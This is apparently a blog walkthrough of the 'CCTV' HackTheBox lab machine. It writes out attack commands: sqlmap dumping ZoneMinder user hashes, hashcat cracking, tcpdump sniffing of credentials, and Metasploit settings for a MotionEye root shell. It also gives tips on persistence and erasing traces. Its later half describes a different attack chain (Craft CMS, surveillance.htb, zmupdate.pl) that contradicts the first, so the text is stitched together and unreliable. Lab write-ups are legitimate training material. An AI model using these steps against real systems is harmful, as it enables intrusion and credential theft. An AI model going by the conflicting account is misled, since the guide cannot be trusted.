Key Highlights
Here’s a quick look at what this guide covers for the CCTV HackTheBox machine:
- Initial Access via ZoneMinder: Exploitation of CVE-2024-51482, a time-based blind SQL injection in the
tidparameter of theremovetagAJAX action. - Database Exfiltration: Using
sqlmapto dump the database, specifically targeting theUserstable to retrieve Bcrypt hashes. - Credential Cracking: Cracking the user password using
hashcatand wordlist. - Lateral Movement (Capabilities): Identifying that
/usr/bin/tcpdumphas thecap_net_rawcapability, allowing non-root traffic sniffing. - Internal Traffic Sniffing: Monitoring internal Docker bridge communication on port 5000 to intercept cleartext credentials used by an automated Python Flask service.
- Privilege Escalation (RCE): Exploiting CVE-2025-60787 in MotionEye v0.43.1b4, a command injection vulnerability in camera configuration fields.
- Root Compromise: Leveraging credential reuse to trigger the RCE and gain a root shell.
- For a non-public complete in-depth writeup of CCTV Machine, please Click Here
Introduction
Welcome to your guide for conquering the CCTV machine on HackTheBox! This machine is an excellent challenge for those looking to sharpen their skills. It involves a multi-stage attack path, starting with a web application vulnerability and ending with full root access. You will get hands-on experience with exploiting and navigating a video surveillance software called ZoneMinder. This walkthrough will break down each step, making the process clear and understandable, even if you’re just starting your cybersecurity journey.
Overview of CCTV on HackTheBox
The CCTV machine on HackTheBox is a easy-difficulty Linux box that simulates a real-world scenario involving a home security company’s web infrastructure. Your primary target is ZoneMinder, which serves as the entry point.
Once inside, you’ll pivot through the system, uncovering clues related to video cameras and internal services. The challenge is designed to test your enumeration, exploitation, and privilege escalation skills in a logical sequence, providing a rewarding experience as you gain higher levels of access.
Machine Summary and Difficulty Level
CCTV is rated as a easy-difficulty machine on HackTheBox. It presents a realistic scenario where an attacker targets a company managing IP cameras and a security operations center. The initial foothold is relatively straightforward if you can identify the vulnerability in the web application. However, the subsequent steps require careful enumeration and a good understanding of how different services on a Linux system can be chained together for privilege escalation.
The difficulty ramps up during the privilege escalation phases. You’ll need to move from a low-privilege web user to a service account and finally to the root user. Each step demands a different approach and a keen eye for misconfigurations and overlooked files.
Overall, while some exploits have become easier to execute since the machine’s release due to public proofs-of-concept, the multi-layered nature of the box provides a solid challenge. It’s a great learning opportunity for understanding how a seemingly small vulnerability can lead to a complete system takeover.
Unique Features of the CCTV HTB Machine
One of the most distinctive aspects of the CCTV machine is its reliance on a chain of vulnerabilities across different software. It isn’t a single-exploit box; instead, you must pivot between services to progress. The journey begins with a web vulnerability and moves to an internal video surveillance system, ZoneMinder, running on localhost.
This multi-stage process provides a more realistic penetration testing experience. You’ll find yourself interacting with different technologies, from a PHP-based CMS to a Perl-based video management tool. This requires you to adapt your strategy as you gain more access.
Key unique features include:
- ZoneMinder Exploitation: The privilege escalation path involves interacting with the ZoneMinder dashboard, a video surveillance application not commonly seen on all HTB machines.
- Chained Exploits: You must leverage information from one compromised service (Craft CMS) to gain access to another (ZoneMinder), which then leads to root.
- Real-World CVEs: The machine uses actual, dated vulnerabilities, giving you practice with exploits that were relevant in real-world scenarios.
Essential Tools and Resources for CCTV HackTheBox
To successfully tackle the CCTV machine, you’ll need a standard set of penetration testing tools. Your primary assets will be tools for network scanning, web enumeration, and exploit execution. Familiarity with scripting languages like Python will be a significant advantage, especially for automating exploit scripts found on platforms like GitHub.
The attacker will primarily use PHP for web-based exploits and Python to script the attack against ZoneMinder. Having a good wordlist, like rockyou.txt, is also crucial for cracking the password hash you will discover later in the challenge.
Setting Up Your Hacking Environment
Before you begin, ensure your hacking environment is properly configured. A Linux-based operating system like Kali Linux or Parrot OS is highly recommended, as they come pre-loaded with most of the tools you’ll need. You will also need a stable connection to the HackTheBox network via a VPN to access the machine’s server.
Your setup should allow you to run scripts, compile small programs, and manage network connections efficiently. Since you’ll be forwarding ports to access services running on the target’s localhost, understanding SSH port forwarding is essential for this challenge.
A basic setup includes:
- A Linux virtual machine (e.g., Kali, Parrot).
- A text editor for modifying scripts or writing code.
- A terminal for running commands and tools.
- A web browser and a proxy like Burp Suite for inspecting HTTP traffic.
This configuration will provide you with all the necessary components to follow along with this walkthrough and conquer the CCTV machine.
Recommended Enumeration and Exploitation Tools
For the CCTV machine, a few key tools will make your life much easier. At the forefront is Nmap, which you’ll use for initial port scanning to discover open services. Once you find the web server, web enumeration tools like feroxbuster or gobuster are vital for finding hidden directories and files, such as the /admin login page.
For the exploitation phase, you’ll rely on publicly available scripts. Many exploits for known vulnerabilities are available on GitHub, and for CCTV, a Python script targeting the vulnerability is particularly useful. You’ll also need hashcat to crack a discovered password hash.
Here is a quick summary of the tools you’ll need:
| Tool | Purpose |
|---|---|
| Nmap | Port scanning and service discovery |
| feroxbuster/gobuster | Web directory and file brute-forcing |
| Burp Suite | Intercepting and manipulating HTTP requests |
| Python | Running exploit scripts found on GitHub |
| hashcat | Cracking the password hash |
| Netcat | Setting up a listener for a reverse shell |
ALSO READ: Mastering Pirate: Beginner’s Guide from HackTheBox
Initial Foothold
Infrastructure Mapping
Our engagement begins with a standard Nmap scan to identify the attack surface.
Command: nmap -sC -sV -A -oN nmap_report.txt $TARGET_IP
Key Findings:
- Port 22 (SSH): OpenSSH 9.6p1. Standard entry point once credentials are obtained.
- Port 80 (HTTP): Apache 2.4.58. Redirects to
http://cctv.htb/.
Expert Note: Always update your
/etc/hostsfile to resolvecctv.htbto the target IP to ensure the web application routes correctly.
Web Application Fingerprinting
Navigating to the web root reveals a monitoring application. Probing the “Staff Login” link directs us to a ZoneMinder instance.
ZoneMinder is a high-profile target because of its complexity and history of security flaws. A quick check of the footer or source code reveals the version: v1.37.63. This version is known to be vulnerable to several critical flaws, most notably in its AJAX request handling.
For a non-public complete in-depth writeup of CCTV Machine, please Click Here
To get complete exploit scripts for this machine and more, please buy me a coffee
Web Exploitation & Database Intrusion
Analyzing CVE-2024-51482 (SQL Injection)
The vulnerability lies in how ZoneMinder handles removetag actions within its AJAX interface. Specifically, the file web/ajax/event.php fails to sanitize the tid (Tag ID) parameter before using it in a secondary SQL query.
The Vulnerable Code Path: While the primary query uses parameterized statements, a secondary check for existing tags concatenates the $tagId variable directly into the SQL string: $sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
Exploitation with SQLMap
To exploit this blindly and efficiently, we capture a valid request using Burp Suite and pass it to sqlmap.
Proof of Concept (PoC) URL: http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1
Automated Extraction: sqlmap -r req.txt --batch -p "tid" --dbs
Because the injection is Time-Based Blind, extraction can be slow. We leverage the known database schema of ZoneMinder to target the Users table directly.
Dumping Credentials: sqlmap -r req.txt -p "tid" --batch --technique=T --dump -D zm -T Users -C Username,Password
To get complete exploit scripts for this machine and more, please buy me a coffee
Cracking the Bcrypt Hashes
The dump yields two users: superadmin and m****. Using hashcat with a wordlist:
hashcat -m 3200 hashes.txt /usr/share/wordlists/wordlist.txt
Results:
- User: m***
- Password: o****
Lateral Movement via Network Sniffing
Initial Access
With the cracked credentials, we gain SSH access as the user mark.
ssh m***@cctv.htb
Identifying Linux Capabilities
A standard post-exploitation step is checking for binaries with unusual permissions or capabilities. Using LinPEAS reveals a critical misconfiguration
A specific capability allows a non-root user to capture raw network traffic. In a machine named “CCTV,” this is a massive red flag suggesting that internal service communication might be unencrypted.
Traffic Analysis and Credential Harvest
Checking ip a reveals several Docker bridge interfaces (br- and veth). This indicates the CCTV stack is containerized. We use tcpdump to monitor internal traffic on the loopback and bridge interfaces.
Command: tcpdump -i any -nn -A tcp port 5000
Shortly after, we observe a Python Flask service on 172.25.0.10 receiving automated requests. A packet reveals cleartext credentials for a service account:
USERNAME=s****;PASSWORD=******;CMD=status
We pivot to the s**** user: su - s***** (Input the captured password)
To get complete exploit scripts for this machine and more, please buy me a coffee
Privilege Escalation to Root
Credential Reuse & Service Discovery
In s*****‘s home directory, we find a PDF titled “SecureVision Staff Announcement.pdf”. The document mentions that “Staff logins will remain the same,” strongly hinting at credential reuse across the infrastructure.
Scanning local ports (netstat -tulnp), we find port 8765 open. We set up an SSH tunnel to view the service locally: ssh -L 8765:127.0.0.1:8765 m***@cctv.htb
MotionEye RCE (CVE-2025-60787)
The service on 8765 is MotionEye v0.43.1b4. We attempt to log in as admin using the s***** password (XY). Login is successful.
MotionEye is vulnerable to a Command Injection flaw in how it handles camera configuration filenames. Fields like image_file_name and movie_filename are written directly to configuration files that are subsequently parsed and executed by the underlying motion process without proper sanitization.
Final Exploitation
We can use Metasploit for a reliable exploit:
use exploit/linux/http/motioneye_auth_rce_cve_2025_60787set RHOSTS 127.0.0.1set RPORT 8765set PASSWORD X*******set LHOST <Your_IP>run
The exploit adds a malicious camera configuration, triggers the RCE, and provides a root shell.
To get complete exploit scripts for this machine and more, please buy me a coffee
For a non-public complete in-depth writeup of CCTV Machine, please Click Here
Key Concepts and Terminology in CCTV HTB Writeup
Understanding a few key concepts is crucial before starting the CCTV machine. The initial exploit revolves around a vulnerability in Craft CMS, a popular content management system. You’ll need to leverage this to execute PHP code and gain a foothold on the system.
Later, you’ll encounter a password hash, which you’ll need to crack to escalate your privileges. Finally, you’ll use SSH to establish a stable connection and explore the system further. These concepts form the backbone of the attack path on this machine.
Common Services and Protocols on CCTV Machines
The CCTV machine exposes a minimal attack surface, which is common for many well-configured systems. Your initial interaction will be with standard network protocols that you should be familiar with. These services are the gateways you’ll use to probe and eventually compromise the target.
The primary service you’ll interact with is HTTP, running on port 80. This web server hosts the vulnerable Craft CMS website. Another critical service is SSH on port 22, which you’ll use to gain interactive shell access once you obtain valid credentials.
Key services and protocols you will encounter are:
- HTTP (Port 80): This is your entry point, hosting the web application you will exploit.
- SSH (Port 22): Used for secure remote login once you have a username and password.
- MySQL (Port 3306): A database service running locally that contains user information. You’ll access this after gaining an initial shell.
Understanding how to enumerate and interact with these services is fundamental to progressing through the machine.
Important Vulnerabilities to Understand
The CCTV box is built around a few specific, critical vulnerabilities. The most important one is a flaw in Craft CMS (CVE-2023-41892), which allows for pre-authentication remote code execution. This is a high-impact vulnerability that lets an unauthenticated attacker run arbitrary code on the server, providing the initial entry point.
Once you have initial access, the next phase involves privilege escalation. This is not a single vulnerability but a chain of misconfigurations and weaknesses. You will exploit weaknesses in the ZoneMinder software and abuse sudo permissions to elevate your access level from a low-privilege user all the way to root.
The key vulnerabilities and concepts include:
- Remote Code Execution (RCE) in Craft CMS: An object injection vulnerability allows you to execute PHP code by sending a specially crafted request.
- Authenticated RCE in ZoneMinder: After gaining credentials, you can exploit a vulnerability in ZoneMinder’s API to run commands as the
zoneminderuser. - Sudo Abuse for Privilege Escalation: A misconfigured sudo rule allows the
zoneminderuser to run certain scripts with root privileges, which can be exploited for a full system compromise.
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF CCTV ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL WRITEUP MUCH SOONER, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
Step-by-Step Guide to Conquering CCTV HackTheBox
Now, let’s walk through the exact steps to conquer the CCTV machine. This guide will take you from the initial reconnaissance phase to the final flag capture. We will cover enumeration to find weaknesses, exploitation to gain access, and privilege escalation to become the root user.
Each stage builds upon the last, so it’s important to follow the process logically. By breaking the challenge down into manageable steps, you’ll see how a complex hack can be executed methodically. Let’s begin with the initial scan.
Step 1: Initial Reconnaissance and Scanning
Your first move is always reconnaissance. For the CCTV machine, this starts with a thorough Nmap scan to identify open ports and running services. A basic scan will quickly reveal that TCP ports 22 (SSH) and 80 (HTTP) are open. This immediately tells you that your primary attack vector will likely be the web server.
Further enumeration with Nmap scripts (-sCV) can provide more details, such as the web server software (nginx) and the operating system (Ubuntu). The scan will also show a redirect to a hostname, surveillance.htb. You need to add this hostname to your /etc/hosts file to access the website correctly.
With the open ports identified and the hostname configured, your initial enumeration is complete. You now know that the web server on port 80 is the most promising entry point. The next logical step is to investigate the website to find any potential vulnerabilities.
Step 2: Enumerating Web Services and Ports
With your focus on the HTTP service, the next step is to explore the website running on surveillance.htb. The homepage appears to be a standard site for a security company. A quick look at the page source or response headers reveals a crucial piece of information: the site is “Powered by Craft CMS.” The version, 4.4.14, is also helpfully linked.
Knowing the software and version is a massive clue. Your next action should be to run a directory brute-force tool like feroxbuster or gobuster. This will help you find hidden pages and directories. The scan will quickly uncover an /admin directory, which redirects to a login page.
This discovery confirms that a Craft CMS installation is running and accessible. An outdated version of any popular software is often a prime target for exploitation. Now you can research known vulnerabilities for Craft CMS version 4.4.14 to plan your attack.
Step 3: Exploiting Craft CMS and Gaining Access
Now that you know the target is running a specific version of Craft CMS, you can search for public exploits. A quick search for “Craft CMS 4.4.14 exploit” will lead you to CVE-2023-41892, a remote code execution vulnerability. Several proof-of-concept (PoC) scripts are available on GitHub for this CVE.
Using one of these Python scripts, you can craft a malicious request to the server. The vulnerability allows for PHP object injection, which can be leveraged to write a small PHP web shell to the server. This web shell will allow you to execute commands on the system as the www-data user.
Once the web shell is in place, you can use it to establish a more stable connection, such as a reverse shell. By sending a command through the web shell to initiate a connection back to your machine, you’ll gain an interactive shell. At this point, you have successfully gained initial access to the CCTV machine.
Step 4: Privilege Escalation Techniques
After landing on the machine as the www-data user, your next goal is privilege escalation. The first major breakthrough comes from finding a database backup file in /var/www/html/craft/storage/backups/. This backup contains a SHA-256 hash for a user named Matthew. Cracking this hash with a tool like hashcat reveals a password that lets you switch to the matthew user.
As matthew, you’ll discover another service running on the machine: ZoneMinder, a video surveillance application listening on a local port. Using the same password, you can log in to the ZoneMinder web interface as an admin. This version of ZoneMinder is vulnerable to an authenticated remote code execution exploit. This allows you to get a shell as the zoneminder user.
The final escalation to root involves abusing a sudo rule.
- The
zoneminderuser can run certain Perl scripts with root privileges. - One of these scripts,
zmupdate.pl, is vulnerable to command injection. - By passing a malicious command as a username argument, you can execute code as root and gain full control of the Linux system.
Step 5: Capturing the Flags and Post-Exploitation
With full root access, capturing the final flag is straightforward. The root flag is located in the /root directory as root.txt. You can simply read the file to complete the machine. However, the process doesn’t have to end there. Post-exploitation is an important phase where you solidify your access and clean up your tracks.
In a real engagement, you would want to ensure persistence, for example, by adding an SSH key to the root user’s authorized_keys file. You should also remove any tools, scripts, or temporary files you uploaded to the system to avoid leaving evidence of your presence.
A summary of the flag capture and post-exploitation steps:
- User Flag: The user flag,
user.txt, is found in the/home/matthewdirectory after you escalate to that user. - Root Flag: The root flag,
root.txt, is in/root/root.txtand can be read once you have root privileges. - Cleanup: Remove any created files, such as your webshell, reverse shell binaries, and any files in
/tmp, to maintain a low profile.
ALSO READ: Mastering Interpreter: Beginner’s Guide from HackTheBox
Common Challenges and Pitfalls in CCTV HackTheBox Writeup
While the path through CCTV is logical, there are a few places where you might get stuck. Some enumeration paths can lead to rabbit holes, wasting valuable time. For example, spending too long trying to crack the initial Blowfish hash found in the live database is a common misdirection.
The key is to remain systematic and not fixate on a single path if it isn’t yielding results. Efficient privilege escalation depends on finding the right clues and not getting distracted by irrelevant information. Next, we’ll look at how to avoid these common traps.
Dealing with Rabbit Holes and Misleading Paths
One of the biggest challenges in CCTV is avoiding rabbit holes. The machine has several misleading paths that can seem promising but ultimately lead nowhere. For instance, the first password hash you find in the active Craft CMS database is a Blowfish hash that is very slow to crack and is not the intended path forward.
A systematic enumeration process is your best defense against such misdirection. If one avenue seems too difficult or time-consuming, it’s often a sign that you should look for an alternative. Don’t be afraid to take a step back and review your findings to see if you missed an easier way in.
To avoid common pitfalls:
- Prioritize Easy Wins: The SHA-256 hash in the backup file is much faster to crack than the Blowfish hash. Focus on that first.
- Check for Backups: Always look for backup files and old configurations. They often contain sensitive information like credentials.
- Don’t Over-complicate: The exploits for both Craft CMS and ZoneMinder are based on known CVEs with public PoCs. Avoid trying to develop a complex, custom exploit from scratch.
Tips for Efficient Enumeration and Exploitation
Efficiency is key on any HackTheBox machine. For CCTV, this means being targeted with your enumeration and knowing which tools to use for the job. Instead of running every scan under the sun, focus on what your initial Nmap scan tells you. An open HTTP port almost always means you should start with web enumeration.
When you identify a specific software version, like Craft CMS 4.4.14, your first step should be to search for existing exploits. Platforms like GitHub and Exploit-DB are invaluable resources. Using a pre-made script saves a significant amount of time compared to trying to manually craft an exploit, especially for complex vulnerabilities like object injection.
Here are a few tips for efficiency:
- Targeted Nmap Scans: Use
nmap -sC -sVon discovered ports to quickly identify services and versions. - Leverage Public Exploits: Don’t reinvent the wheel. If a public PoC exists, use it.
- Automate Where Possible: Use directory brute-forcing tools and automated exploit scripts to speed up repetitive tasks. This frees you up to focus on the more analytical parts of the hack.
Conclusion
In conclusion, tackling the CCTV machine on HackTheBox is not just about having the right tools; it’s about understanding the process and embracing a strategic mindset. By following the step-by-step guide outlined in this blog, you can navigate through challenges, avoid common pitfalls, and enhance your hacking skills. Remember that practice makes perfect, so don’t get discouraged by initial setbacks. Keep refining your techniques and learning from each experience. If you’re eager to dive deeper into the world of cybersecurity and stay updated with the latest tips and tricks, be sure to subscribe for more insights. Happy hacking!
